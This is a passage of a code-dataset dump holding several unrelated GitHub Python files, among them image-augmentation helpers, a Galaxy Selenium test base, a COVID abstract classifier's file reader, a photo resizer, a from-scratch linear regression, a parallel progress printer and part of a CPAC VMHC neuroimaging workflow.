LOCAL_SIZE:\n y1 = IMAGE_SIZE - LOCAL_SIZE\n \n x2, y2 = np.array([x1, y1]) + LOCAL_SIZE\n points.append([x1, y1, x2, y2])\n \n p1 = b[0]\n q1 = b[1]\n p2 = b[2]\n q2 = b[3]\n \n m = np.zeros((IMAGE_SIZE, IMAGE_SIZE, 1), dtype=np.uint8)\n m[q1:q2 + 1, p1:p2 + 1] = 1\n mask.append(m)\n \n \n return 
np.array(points), np.array(mask)\n \n\ndef output_image(images, dst, box):\n fig = plt.figure(figsize=(15,4))\n for i, image in enumerate(images):\n text, img = image\n fig.add_subplot(1, len(images), i + 1)\n plt.imshow(img)\n plt.tick_params(labelbottom=False)\n plt.tick_params(labelleft=False)\n plt.gca().get_xaxis().set_ticks_position('none')\n plt.gca().get_yaxis().set_ticks_position('none')\n plt.gca().add_patch(plt.Rectangle((box[0],box[1]),box[2] - box[0],box[3] - box[1],linewidth=1,edgecolor='g',facecolor='none'))\n plt.xlabel(text)\n plt.savefig(dst)\n plt.close()\n \ndef change_color(img, box):\n button = img[box[1]:box[3]+1,box[0]:box[2]+1]\n shift = random.randint(50, 150)\n if random.randint(0, 1) == 1:\n shift *= -1\n channel = random.randint(0, 2)\n button[:,:,channel] = button[:,:,channel] + shift\n #button = button + 100\n img[box[1]:box[3]+1,box[0]:box[2]+1] = button\n return img\n\ndef change_size(img, box):\n button = img[box[1]:box[3]+1,box[0]:box[2]+1]\n height, width, channel = button.shape\n button = Image.fromarray(button.astype('uint8')).convert('RGB')\n #button.show()\n k = random.uniform(0.5, 3)\n new_width = int(width*k)\n new_height = int(height*k)\n button = button.resize((new_width, new_height), Image.ANTIALIAS)\n \n left = (new_width - width)/2\n top = (new_height - height)/2\n right = (width + new_width)/2\n bottom = (height + new_height)/2\n #button.show()\n button = button.crop((left, top, right, bottom))\n button = button.resize((width, height), Image.ANTIALIAS)\n #button.show()\n img[box[1]:box[3]+1,box[0]:box[2]+1] = np.array(button)\n return img\n\ndef modify_images(train_batch):\n x_batch = []\n for i in train_batch:\n \n img = i[0].copy()\n box = i[1].copy()\n box = [int(x) for x in box]\n \n a = box[2] - box[0]\n b = box[3] - box[1]\n \n if (a < 0 or b < 0):\n chance = random.randint(0,0)\n print(\"Wrong button bound!!!\")\n else:\n chance = random.randint(0,0)\n if (chance == 0):\n x_batch.append(change_color(img, box))\n else:\n x_batch.append(change_size(img, box))\n return x_batch\n\nif __name__ == '__main__':\n test()\n \n","repo_name":"ZhihengZhou/Project-Criticism","sub_path":"Src/test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":9213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12975346164","text":"from galaxy_test.driver import integration_util\nfrom galaxy_test.selenium import (\n framework\n)\n\nselenium_test = framework.selenium_test\n\n\nclass SeleniumIntegrationTestCase(integration_util.IntegrationTestCase, framework.TestWithSeleniumMixin, framework.UsesLibraryAssertions):\n\n def setUp(self):\n super().setUp()\n self.setup_selenium()\n\n def tearDown(self):\n self.tear_down_selenium()\n super().tearDown()\n\n\n__all__ = (\n 'selenium_test',\n 'SeleniumIntegrationTestCase',\n)\n","repo_name":"genomicanalysis/galaxy","sub_path":"test/integration_selenium/framework.py","file_name":"framework.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"37702479903","text":"import random\nimport math\nN = 100000 \n# Số điểm sinh ra\nN_T = 0\n# Đếm số điểm trong đường tròn\n\nfor i in range(N): # Sinh các số nằm trong [-1, 1]\n\tx = random.random()*2 - 1 # random.random() sinh ra các số nằm trong đoạn [0, 1]\n\ty = random.random()*2 - 1\n\n\tx2 = x**2\n\ty2 = y**2\n\n\tif(math.sqrt(x2 + y2) <= 1.0):\n\t\tN_T += 1\n\npi = (N_T/N)*4\nprint(pi) 
\nprint(math.exp(2))","repo_name":"rextran/AI","sub_path":"Week2/Exercise/estimate_Pi.py","file_name":"estimate_Pi.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31571743876","text":"import csv\nimport json\nimport string\nimport os\n\nVOCABULARY = set()\nIS_LABEL_INT = False\n\nWORD_INDEX = {}\nPROCESS_INDEXES = [\n 2, # TITLE\n 3, # ABSTRACT\n]\nPROCESS_FIELDS = {'title', 'abstract'}\n\nCLASSES = [\n 'treatment', # 0\n 'diagnosis', # 1\n 'prevention', # 2\n 'mechanism', # 3\n 'transmission', # 4\n 'epidemic forecasting', # 5\n 'case report' # 6\n]\n\nTOTAL_CLASS_NUM = 7\n\nwith open('stopwords.txt') as fp: # Load Stopwords\n STOPWORDS = set(fp.read().splitlines())\n\n\nclass Document:\n def __init__(self, input :list):\n self.pmid: int = input[0]\n self.journal: str = input[1]\n self.title: list = input[2]\n self.abstract: list = input[3]\n self.keywords: list = input[4]\n self.pub_type: list = input[5]\n self.authors: list = input[6]\n self.doi: str = input[7]\n self.label: list = input[8]\n\n def get_bag_of_words(self):\n ret = {}\n words = self.title + self.abstract\n\n for word in words:\n if word in ret.keys():\n ret[word] = ret[word] + 1\n else:\n ret[word] = 1\n\n return ret\n\n def to_string(self):\n return_val = {\n \"pmid\": self.pmid,\n \"title\": self.title,\n \"abstract\": self.abstract,\n \"label\": self.label\n }\n return json.dumps(return_val)\n\n def is_equal(self, other):\n if self.pmid == other.pmid:\n return True\n return False\n\n\ndef get_train_and_test_data_as_list() -> tuple:\n train_filename = \"./Datasets/BC7-LitCovid-Train.csv\"\n test_filename = \"./Datasets/BC7-LitCovid-Dev.csv\"\n\n train_data = read_csv(train_filename)\n train_data = normalize_data(train_data, IS_LABEL_INT)\n\n test_data = read_csv(test_filename)\n test_data = normalize_data(test_data, IS_LABEL_INT)\n\n train_data = [Document(row) for row in train_data]\n test_data = [Document(row) for row in test_data]\n\n return train_data, test_data\n\n\ndef read_csv(file_name:str) -> list:\n data = csv.reader(open(file_name, \"rt\"))\n\n return list(data)[1:]\n\n\ndef normalize_data(data: list, labels_int: bool) -> list:\n for data_index in PROCESS_INDEXES:\n for i in range(len(data)):\n data[i][data_index] = get_words(data[i][data_index])\n\n update_labels(data, labels_int)\n\n return data\n\n\ndef get_words(input: str, is_remove_stopwords: bool = True) -> list:\n input_words = input.translate(str.maketrans('', '', string.punctuation)).lower()\n if is_remove_stopwords:\n input_words = remove_stopwords(input_words.split())\n\n return input_words\n\n\ndef remove_stopwords(words: list) -> list:\n ret = []\n\n for word in words:\n if word not in STOPWORDS:\n ret.append(word)\n\n return ret\n\n\ndef update_labels(original_data, is_int: bool):\n for i in range(len(original_data)):\n labels = original_data[i][-1]\n labels = labels.lower()\n labels = labels.split(';')\n\n original_data[i][-1] = encode_label(labels) if is_int else labels\n\n assert original_data[i][-1]\n\n\ndef encode_label(labels: str) -> int:\n ret = 0\n\n for j in range(len(CLASSES)):\n if CLASSES[j] in labels:\n ret = ret | (1 << j)\n\n return ret\n\n\ndef create_dump_path(path):\n os.makedirs(os.path.dirname(path), exist_ok=True)\n\n\ndef dump(train_list: list, test_list: list):\n path = os.path.join(\".\", \"dump_files\", \"\")\n path_train = os.path.join(\".\", \"dump_files\", \"train\")\n path_test = os.path.join(\".\", 
\"dump_files\", \"test\")\n create_dump_path(path)\n\n docnum: int = 0\n train_dump = open(path_train, \"w\")\n to_write = {}\n for single_doc in train_list:\n single_dict = single_doc.to_string()\n to_write[docnum] = single_dict\n docnum = docnum + 1\n json.dump(to_write, train_dump)\n train_dump.close()\n\n docnum = 0\n test_dump = open(path_test, \"w\")\n to_write = {}\n for single_doc in test_list:\n single_dict = single_doc.to_string()\n to_write[docnum] = single_dict\n docnum = docnum + 1\n json.dump(to_write, test_dump)\n test_dump.close()\n\n\ndef write_dump_files():\n train_data, test_data = get_train_and_test_data_as_list()\n dump(train_data, test_data)\n\n\ndef read_dump_files():\n\n train_list = []\n test_list = []\n\n raw_file_train = open(\"./dump_files/train\")\n raw = json.load(raw_file_train)\n for i in range(len(raw)):\n key = str(i)\n raw_doc = json.loads(raw[key])\n pmid = raw_doc[\"pmid\"]\n title = raw_doc[\"title\"]\n abstract = raw_doc[\"abstract\"]\n label = raw_doc[\"label\"]\n params = [pmid, \"\", title, abstract, \"\", \"\", \"\", \"\", label]\n train_list.append(Document(params))\n raw_file_train.close()\n\n raw_file_test = open(\"./dump_files/test\")\n raw = json.load(raw_file_test)\n for i in range(len(raw)):\n key = str(i)\n raw_doc = json.loads(raw[key])\n pmid = raw_doc[\"pmid\"]\n title = raw_doc[\"title\"]\n abstract = raw_doc[\"abstract\"]\n label = raw_doc[\"label\"]\n params = [pmid, \"\", title, abstract, \"\", \"\", \"\", \"\", label]\n test_list.append(Document(params))\n raw_file_test.close()\n\n return train_list, test_list\n","repo_name":"Voursstrreds/TextClassificationCovid19","sub_path":"FileReader.py","file_name":"FileReader.py","file_ext":"py","file_size_in_byte":5258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42778308017","text":"import json\n\nfrom app import db, Category, CatLink\n\ndb.drop_all()\ndb.create_all()\n\nprint(\"Migrating Categories...\")\nwith open(\"ranked_cats.json\") as jsonfile:\n js = json.load(jsonfile)\n db.session.add_all(Category(pageid=int(k), pagecount=v['page_count'])\n for k, v in js.items())\n\nprint(\"Migrating CatLinks...\")\nwith open(\"all_subcats.json\") as jsonfile:\n js = json.load(jsonfile)\n db.session.add_all(CatLink(parent_id=int(k), child_id=int(c))\n for k, v in js.items()\n if k != 'None'\n for c in set(v))\n\nprint(\"Committing...\")\ndb.session.commit()\n","repo_name":"zero-fifteen/random-wiki","sub_path":"load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39026715728","text":"#!/usr/bin/env python\n\n\ndef get_size(filename):\n from PIL import Image\n image = Image.open(filename)\n return image.size\n\n\ndef resize(newfilename, filename, newsize):\n from PIL import Image\n image = Image.open(filename)\n image = image.resize(newsize)\n image.save(newfilename)\n\n\ndef create_thumbnail(thumbnail_name, filename, factor=6):\n orig_size = get_size(filename)\n newsize = (orig_size[0]/factor, orig_size[1]/factor)\n resize(thumbnail_name, filename, newsize)\n\n\ndef get_name_and_orientation(filename, prefix=\"reduced\"):\n resized_filename = \"{0}_{1}\".format(prefix, filename)\n\n size = get_size(filename)\n if size[0] > size[1]:\n newsize = (600, 450)\n orientation = \"horizontal\"\n else:\n newsize = (450, 600)\n orientation = \"vertical\"\n\n return (resized_filename, orientation)\n\n\ndef 
resize_without_thumbnail(filename, prefix=\"reduced\"):\n\n resized_filename = \"{0}_{1}\".format(prefix, filename)\n\n size = get_size(filename)\n if size[0] > size[1]:\n newsize = (600, 450)\n orientation = \"horizontal\"\n else:\n newsize = (450, 600)\n orientation = \"vertical\"\n resize(resized_filename, filename, newsize)\n\n return (resized_filename, orientation)\n\n\ndef resize_and_thumbnail(filename):\n thumbnail_filename = \"thumb_{0}\".format(filename)\n (resized_filename, orientation) = resize_without_thumbnail(filename)\n create_thumbnail(thumbnail_filename, resized_filename)\n\nif __name__ == \"__main__\":\n from sys import argv\n\n filename = argv[1]\n resize_and_thumbnail(filename)\n","repo_name":"kd0kfo/photoalbum","sub_path":"photoalbum/resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"21171862183","text":"# Approximate Value\r\n# y = wx + b\r\n\r\n# cost function\r\n\r\n# MSE = J(m,b) = 1/N * (for all i (actual-predicated)^2)\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nclass Linearregression:\r\n \r\n def __init__(self,filename,lr=0.001, iterations = 1000):\r\n self.lr = lr\r\n self.iterations = iterations\r\n self.weights = None\r\n self.bias = None\r\n self.filename = filename\r\n \r\n \r\n def plot_data(self,X,Y):\r\n plt.plot(X,Y)\r\n plt.scatter(X,Y,edgecolors='blue',color='red')\r\n plt.xlabel(\"Experience\")\r\n plt.ylabel(\"Salary\")\r\n plt.title(\"Experience vs Salaries\")\r\n plt.show()\r\n \r\n def plot_reg_line(self,X,Y):\r\n plt.plot(X,(self.weights[0]*X)+self.bias)\r\n plt.scatter(X,Y,edgecolors='blue',color='red')\r\n plt.xlabel(\"Experience\")\r\n plt.ylabel(\"Regression Line\")\r\n plt.title(\"Regression Line\")\r\n plt.show()\r\n \r\n \r\n \r\n \r\n def load_data(self):\r\n dataset = pd.read_csv(self.filename).values\r\n X=dataset[:,:-1]\r\n Y=dataset[:,-1]\r\n return X,Y\r\n \r\n \r\n \r\n def fit(self,X,Y):\r\n ##Initializing parameters\r\n n_samples,n_features = X.shape\r\n self.weights = np.zeros(n_features)\r\n self.bias = 0\r\n print(\"X_train_Shape : \", X.shape)\r\n print(\"Y_train_Shape : \", Y.shape)\r\n \r\n for _ in range(self.iterations):\r\n # New weight = Old weight - learning rate * derivative(old weight)\r\n # Y_predicted = wx+b\r\n \r\n \r\n Y_predicted = np.dot(X,self.weights) + self.bias\r\n \r\n dw = (1/n_samples) *(2* np.dot(X.T,(Y_predicted-Y)))\r\n db = (1/n_samples) *(2* np.sum(Y_predicted-Y))\r\n \r\n self.weights = self.weights - self.lr * dw\r\n self.bias = self.weights - self.lr * db\r\n \r\n \r\n \r\n \r\n def predict(self,X):\r\n Y_predicted = np.dot(X,self.weights) + self.bias\r\n return Y_predicted\r\n \r\n def print_MSE(self,Y_test,Y_pred):\r\n print(\"Mean Squared Error : \", np.sum(np.square(Y_pred-Y_test))/len(Y_pred))\r\n \r\n\r\nobj = Linearregression(\"Salary_data.csv\",lr=0.023,iterations=1000)\r\nX,Y = obj.load_data()\r\nobj.plot_data(X, Y)\r\nobj.fit(X,Y)\r\nY_pred = obj.predict(X)\r\nobj.plot_reg_line(X, Y)\r\nobj.print_MSE(Y, Y_pred)\r\n \r\n ","repo_name":"Adit-jain/Multinomial_regression_From_Scratch","sub_path":"Linear Regression from scratch/LR.py","file_name":"LR.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7249934026","text":"import datetime\nimport numpy as np\nimport pandas as pd\nfrom itertools import 
repeat\n\n\nclass ParallelPrinter:\n\n program_started = False\n\n def __init__(self, total_procs, proc_job_dict):\n \"\"\"\n Constructor method to initialize the parallel printer. It will\n initialize the printing format based on the amount of processes.\n\n :param total_procs: The total number of processes.\n :param proc_job_dict: A dictionary the number of jobs\n associated with each processes.\n \"\"\"\n\n self.prev_print_carriage = False\n\n # Assigns the parameters for later reference.\n\n self.total_procs = total_procs\n self.proc_job_dict = proc_job_dict\n self.max_jobs = max(self.proc_job_dict.values())\n self.min_jobs = min(self.proc_job_dict.values())\n self.current_job = 0\n\n self.proc_job_completed_dict = {proc: 0\n for proc in self.proc_job_dict.keys()}\n\n # Creates a dataframe of the time it takes to complete each job\n # within each process.\n\n self.start_time = None\n self.job_time_tracker = pd.DataFrame(np.nan,\n index=range(0, self.max_jobs),\n columns=self.proc_job_dict.keys())\n\n # Initializes the printables to be edited in the\n # configure_prints methods.\n\n self.regular_divider = ''\n self.parallel_title = ''\n self.parallel_message = ''\n\n self.configure_prints()\n\n def configure_prints(self):\n \"\"\"\n Method to configure the printable statements based on a variable\n number of processes and jobs.\n\n \"\"\"\n\n # Creates a tuple to be referenced in the divider string. The\n # + 2 accomodates for the time and job completion columns.\n tup = tuple(repeat((''), self.total_procs + 2))\n\n time_col_len = 12\n job_col_len = 17\n\n # Determines the process column length from whats left after the\n # time and job completion columns are allocated. Note, the\n # process columns are of equal length. Therefore, any extra\n # space is allocated to the time column.\n\n process_col_len = (120 - time_col_len - job_col_len) // self.total_procs\n time_col_len += (120 - time_col_len - job_col_len) % self.total_procs\n\n # Creates a formattable string based on the lengths of each\n # column for the divider.\n\n time_col_div_str = '+{:-<' + str(time_col_len - 2) + '}+'\n job_col_div_str = '{:-<' + str(job_col_len - 1) + '}+'\n process_col_div_str = '{:-<' + str(process_col_len - 1) + '}+'\n\n # Concatenates the formattable strings and formats them with an\n # empty tuple.\n\n parallel_divider_fmt = time_col_div_str + \\\n job_col_div_str + \\\n process_col_div_str * self.total_procs\n self.parallel_divider = parallel_divider_fmt.format(*tup)\n\n # Creates a formattable string based on the lengths of each\n # column for the messages.\n\n time_col_msg_str = '| {:>' + str(time_col_len - 4) + '} |'\n job_col_msg_str = ' {:>' + str(job_col_len - 3) + '} |'\n process_col_msg_str = ' {:>' + str(process_col_len - 3) + '} |'\n self.parallel_message = time_col_msg_str + \\\n job_col_msg_str + \\\n process_col_msg_str * self.total_procs\n\n # Creates a tuple of titles for each process. Then, assigns the\n # Time, job completion, and process title tuple to a regular\n # parallel message string to create the title.\n\n process_titles = tuple(['P_' + str(i)\n for i in range(1, self.total_procs + 1)])\n self.parallel_title = self.parallel_message.format('Time',\n 'Job # / Total',\n *process_titles)\n\n def update(self, proc_num: int, job_num: int):\n \"\"\"\n Method to update the information the parallel printer is\n tracking. 
It will only print if that job is completed for all\n processes.\n :param proc_num: The integer id of the process.\n :param job_num: The integer id of the job.\n \"\"\"\n\n # Assigns the time completed to the job_tracker.\n\n time_completed = datetime.datetime.now().replace(microsecond=0)\n self.job_time_tracker.iloc[job_num, proc_num] = time_completed\n\n self.proc_job_completed_dict[proc_num] += 1\n\n # self.print_jobs_completed()\n\n # Checks to see if the jobs in that index are also completed\n # in the other processes.\n non_min_procs = [proc for proc in self.proc_job_dict.keys()\n if self.proc_job_dict[proc] > job_num]\n\n if not self.job_time_tracker.iloc[job_num, non_min_procs].isnull().values.any():\n self.print_parallel_message(job_num)\n\n def print_jobs_completed(self):\n current_time = datetime.datetime.now().time().replace(microsecond=0)\n total_jobs = sum(self.proc_job_dict.values())\n jobs_completed = sum(self.proc_job_completed_dict.values())\n\n job_str = '{:d} / {:d}'.format(jobs_completed, total_jobs)\n\n job_strs = ['{:} / {:}'.format(str(self.proc_job_completed_dict[proc]),\n str(self.proc_job_dict[proc])) for proc in self.proc_job_dict.keys()]\n\n if self.prev_print_carriage:\n print('\\r', end='')\n print(self.parallel_message.format(str(current_time),\n job_str, *job_strs),\n end='', flush=True)\n\n else:\n print(self.parallel_message.format(str(current_time),\n job_str, *job_strs),\n end='', flush=True)\n self.prev_print_carriage = True\n\n def print_parallel_message(self, job_num: int):\n \"\"\"\n Method to print a message of information gained about the\n parallel processes.\n :param job_num: The integer id of the job.\n \"\"\"\n\n # Gets the current time.\n\n current_time = datetime.datetime.now().time().replace(microsecond=0)\n\n # Creates and formats the job completion string.\n\n job_str = '{:d} / {:d}'.format(job_num + 1, self.max_jobs)\n\n # Checks to see if this is the first job completed, if it is,\n # then it does not try to print a time delta. 
If it is not, then\n # it will print the differences in time completed for the jobs.\n\n print('\\r', end='')\n self.prev_print_carriage = False\n\n if job_num == 0:\n prev_job_times = self.start_time\n current_job_times = self.job_time_tracker.iloc[job_num, :].values\n\n cond = current_job_times != -1\n splits = np.where(cond, current_job_times - prev_job_times, '-')\n\n job_times = tuple([str(split) for split in splits])\n\n print(self.parallel_message.format(str(current_time),\n job_str,\n *job_times))\n else:\n\n prev_job_times = self.job_time_tracker.iloc[job_num - 1, :].values\n current_job_times = self.job_time_tracker.iloc[job_num, :].values\n\n cond = current_job_times != -1\n splits = np.where(cond, current_job_times - prev_job_times, '-')\n\n job_times = tuple([str(split) for split in splits])\n\n print(self.parallel_message.format(str(current_time),\n job_str,\n *job_times))\n\n self.print_jobs_completed()\n\n def print_notify_parallel_begin(self):\n \"\"\"\n Method to print the notification of the beginning of a parallel\n printing sequence.\n \"\"\"\n\n self.start_time = datetime.datetime.now().replace(microsecond=0)\n\n print(self.parallel_divider)\n print(self.parallel_title)\n print(self.parallel_divider)\n\n def print_notify_parallel_end(self):\n \"\"\"\n Method to print the notification of the ending of a parallel\n printing sequence.\n \"\"\"\n\n print(self.parallel_divider)\n\n","repo_name":"Lucas-Frey/Time_Series_Modeler","sub_path":"Utils/ParallelPrinter.py","file_name":"ParallelPrinter.py","file_ext":"py","file_size_in_byte":8406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8302283609","text":"import sys\nimport os\nimport subprocess\nimport nipype.pipeline.engine as pe\nimport nipype.algorithms.rapidart as ra\nimport nipype.interfaces.fsl as fsl\nimport nipype.interfaces.io as nio\nimport nipype.interfaces.utility as util\nfrom .utils import *\nfrom CPAC.vmhc import *\nfrom nipype.interfaces.afni import preprocess\nfrom CPAC.registration import create_wf_calculate_ants_warp, \\\n create_wf_c3d_fsl_to_itk, \\\n create_wf_collect_transforms, \\\n create_wf_apply_ants_warp\n\ndef create_vmhc(use_ants, name='vmhc_workflow'):\n\n \"\"\"\n Compute the map of brain functional homotopy, the high degree of synchrony in spontaneous activity between geometrically corresponding interhemispheric (i.e., homotopic) regions.\n\n\n\n Parameters\n ----------\n\n None\n\n Returns\n -------\n\n vmhc_workflow : workflow\n\n Voxel Mirrored Homotopic Connectivity Analysis Workflow\n\n\n\n Notes\n -----\n\n `Source `_ \n\n Workflow Inputs::\n\n inputspec.brain : string (existing nifti file)\n Anatomical image(without skull)\n\n inputspec.symmetric_brain : string (existing nifti file)\n MNI152_T1_2mm_symmetric_brain.nii.gz\n \n inputspec.rest_res_filt : string (existing nifti file)\n Band passed Image with nuisance signal regressed out(and optionally scrubbed). 
Recommended bandpass filter (0.001,0.1) )\n\n inputspec.reorient : string (existing nifti file)\n RPI oriented anatomical data\n\n inputspec.example_func2highres_mat : string (existing affine transformation .mat file)\n Specifies an affine transform that should be applied to the example_func before non linear warping\n\n inputspec.standard_for_func: string (existing nifti file)\n MNI152_T1_standard_resolution_brain.nii.gz\n\n inputspec.symmetric_skull : string (existing nifti file)\n MNI152_T1_2mm_symmetric.nii.gz\n\n inputspec.twomm_brain_mask_dil : string (existing nifti file)\n MNI152_T1_2mm_brain_mask_symmetric_dil.nii.gz\n\n inputspec.config_file_twomm_symmetric : string (existing .cnf file)\n T1_2_MNI152_2mm_symmetric.cnf\n\n inputspec.rest_mask : string (existing nifti file)\n A mask functional volume(derived by dilation from motion corrected functional volume)\n\n fwhm_input.fwhm : list (float) \n For spatial smoothing the Z-transformed correlations in MNI space.\n Generally the value of this parameter is 1.5 or 2 times the voxel size of the input Image.\n\n inputspec.mean_functional : string (existing nifti file)\n The mean functional image for use in the func-to-anat registration matrix conversion\n to ITK (ANTS) format, if the user selects to use ANTS.\n\n \n Workflow Outputs::\n\n outputspec.highres2symmstandard : string (nifti file)\n Linear registration of T1 image to symmetric standard image\n\n outputspec.highres2symmstandard_mat : string (affine transformation .mat file)\n An affine transformation .mat file from linear registration and used in non linear registration\n\n outputspec.highres2symmstandard_warp : string (nifti file)\n warp file from Non Linear registration of T1 to symmetrical standard brain\n\n outputspec.fnirt_highres2symmstandard : string (nifti file)\n Non Linear registration of T1 to symmetrical standard brain\n\n outputspec.highres2symmstandard_jac : string (nifti file)\n jacobian determinant image from Non Linear registration of T1 to symmetrical standard brain\n\n outputspec.rest_res_2symmstandard : string (nifti file)\n nonlinear registration (func to standard) image\n\n outputspec.VMHC_FWHM_img : string (nifti file)\n pearson correlation between res2standard and flipped res2standard\n\n outputspec.VMHC_Z_FWHM_img : string (nifti file)\n Fisher Z transform map\n\n outputspec.VMHC_Z_stat_FWHM_img : string (nifti file)\n Z statistic map\n\n Order of commands:\n\n - Perform linear registration of Anatomical brain in T1 space to symmetric standard space. For details see `flirt `_::\n\n flirt\n -ref MNI152_T1_2mm_symmetric_brain.nii.gz\n -in mprage_brain.nii.gz\n -out highres2symmstandard.nii.gz\n -omat highres2symmstandard.mat\n -cost corratio\n -searchcost corratio\n -dof 12\n -interp trilinear \n \n - Perform nonlinear registration (higres to standard) to symmetric standard brain. For details see `fnirt `_::\n \n fnirt\n --in=head.nii.gz\n --aff=highres2symmstandard.mat\n --cout=highres2symmstandard_warp.nii.gz\n --iout=fnirt_highres2symmstandard.nii.gz\n --jout=highres2symmstandard_jac.nii.gz\n --config=T1_2_MNI152_2mm_symmetric.cnf\n --ref=MNI152_T1_2mm_symmetric.nii.gz\n --refmask=MNI152_T1_2mm_brain_mask_symmetric_dil.nii.gz\n --warpres=10,10,10 \n\n - Perform spatial smoothing on the input functional image(inputspec.rest_res_filt). 
For details see `PrinciplesSmoothing `_ `fslmaths `_::\n\n fslmaths rest_res_filt.nii.gz\n -kernel gauss FWHM/ sqrt(8-ln(2))\n -fmean -mas rest_mask.nii.gz\n rest_res_filt_FWHM.nii.gz\n \n - Apply nonlinear registration (func to standard). For details see `applywarp `_::\n \n applywarp\n --ref=MNI152_T1_2mm_symmetric.nii.gz\n --in=rest_res_filt_FWHM.nii.gz\n --out=rest_res_2symmstandard.nii.gz\n --warp=highres2symmstandard_warp.nii.gz\n --premat=example_func2highres.mat\n \n \n - Copy and L/R swap the output of applywarp command (rest_res_2symmstandard.nii.gz). For details see `fslswapdim `_::\n\n fslswapdim\n rest_res_2symmstandard.nii.gz\n -x y z\n tmp_LRflipped.nii.gz\n\n\n - Calculate pearson correlation between rest_res_2symmstandard.nii.gz and flipped rest_res_2symmstandard.nii.gz(tmp_LRflipped.nii.gz). For details see `3dTcorrelate `_::\n \n 3dTcorrelate\n -pearson\n -polort -1\n -prefix VMHC_FWHM.nii.gz\n rest_res_2symmstandard.nii.gz\n tmp_LRflipped.nii.gz\n \n \n - Fisher Z Transform the correlation. For details see `3dcalc `_::\n \n 3dcalc\n -a VMHC_FWHM.nii.gz\n -expr 'log((a+1)/(1-a))/2'\n -prefix VMHC_FWHM_Z.nii.gz\n \n \n - Calculate the number of volumes(nvols) in flipped rest_res_2symmstandard.nii.gz(tmp_LRflipped.nii.gz) ::\n \n -Use Nibabel to do this\n \n \n - Compute the Z statistic map ::\n \n 3dcalc\n -a VMHC_FWHM_Z.nii.gz\n -expr 'a*sqrt('${nvols}'-3)'\n -prefix VMHC_FWHM_Z_stat.nii.gz\n \n \n Workflow:\n \n .. image:: ../images/vmhc_graph.dot.png\n :width: 500 \n \n Workflow Detailed:\n \n .. image:: ../images/vmhc_detailed_graph.dot.png\n :width: 500 \n \n\n References\n ----------\n \n .. [1] Zuo, X.-N., Kelly, C., Di Martino, A., Mennes, M., Margulies, D. S., Bangaru, S., Grzadzinski, R., et al. (2010). Growing together and growing apart: regional and sex differences in the lifespan developmental trajectories of functional homotopy. The Journal of neuroscience : the official journal of the Society for Neuroscience, 30(45), 15034-43. 
doi:10.1523/JNEUROSCI.2612-10.2010\n\n\n Examples\n --------\n \n >>> vmhc_w = create_vmhc()\n >>> vmhc_w.inputs.inputspec.symmetric_brain = 'MNI152_T1_2mm_symmetric_brain.nii.gz'\n >>> vmhc_w.inputs.inputspec.symmetric_skull = 'MNI152_T1_2mm_symmetric.nii.gz'\n >>> vmhc_w.inputs.inputspec.twomm_brain_mask_dil = 'MNI152_T1_2mm_brain_mask_symmetric_dil.nii.gz'\n >>> vmhc_w.inputs.inputspec.config_file_twomm = 'T1_2_MNI152_2mm_symmetric.cnf'\n >>> vmhc_w.inputs.inputspec.standard_for_func= 'MNI152_T1_2mm.nii.gz'\n >>> vmhc_w.inputs.fwhm_input.fwhm = [4.5, 6]\n >>> vmhc_w.get_node('fwhm_input').iterables = ('fwhm', [4.5, 6])\n >>> vmhc_w.inputs.inputspec.rest_res = os.path.abspath('/home/data/Projects/Pipelines_testing/Dickstein/subjects/s1001/func/original/rest_res_filt.nii.gz')\n >>> vmhc_w.inputs.inputspec.reorient = os.path.abspath('/home/data/Projects/Pipelines_testing/Dickstein/subjects/s1001/anat/mprage_RPI.nii.gz')\n >>> vmhc_w.inputs.inputspec.brain = os.path.abspath('/home/data/Projects/Pipelines_testing/Dickstein/subjects/s1001/anat/mprage_brain.nii.gz')\n >>> vmhc_w.inputs.inputspec.example_func2highres_mat = os.path.abspath('/home/data/Projects/Pipelines_testing/Dickstein/subjects/s1001/func/original/reg/example_func2highres.mat')\n >>> vmhc_w.inputs.inputspec.rest_mask = os.path.abspath('/home/data/Projects/Pipelines_testing/Dickstein/subjects/s1001/func/original/rest_mask.nii.gz')\n >>> vmhc_w.run() # doctest: +SKIP\n\n \"\"\"\n\n vmhc = pe.Workflow(name=name)\n inputNode = pe.Node(util.IdentityInterface(fields=['rest_res',\n 'example_func2highres_mat',\n 'rest_mask',\n 'standard_for_func',\n 'mean_functional',\n 'brain',\n 'fnirt_nonlinear_warp',\n 'ants_symm_initial_xfm',\n 'ants_symm_rigid_xfm',\n 'ants_symm_affine_xfm',\n 'ants_symm_warp_field']),\n name='inputspec')\n\n\n outputNode = pe.Node(util.IdentityInterface(fields=['rest_res_2symmstandard',\n 'VMHC_FWHM_img',\n 'VMHC_Z_FWHM_img',\n 'VMHC_Z_stat_FWHM_img'\n ]),\n name='outputspec')\n\n\n inputnode_fwhm = pe.Node(util.IdentityInterface(fields=['fwhm']),\n name='fwhm_input')\n\n\n if use_ants == False:\n\n ## Apply nonlinear registration (func to standard)\n nonlinear_func_to_standard = pe.Node(interface=fsl.ApplyWarp(),\n name='nonlinear_func_to_standard')\n\n elif use_ants == True:\n\n # ANTS warp image etc.\n fsl_to_itk_vmhc = create_wf_c3d_fsl_to_itk(0, name='fsl_to_itk_vmhc')\n\n collect_transforms_vmhc = create_wf_collect_transforms(0, name='collect_transforms_vmhc')\n\n apply_ants_xfm_vmhc = create_wf_apply_ants_warp(0,name='apply_ants_xfm_vmhc')\n\n # 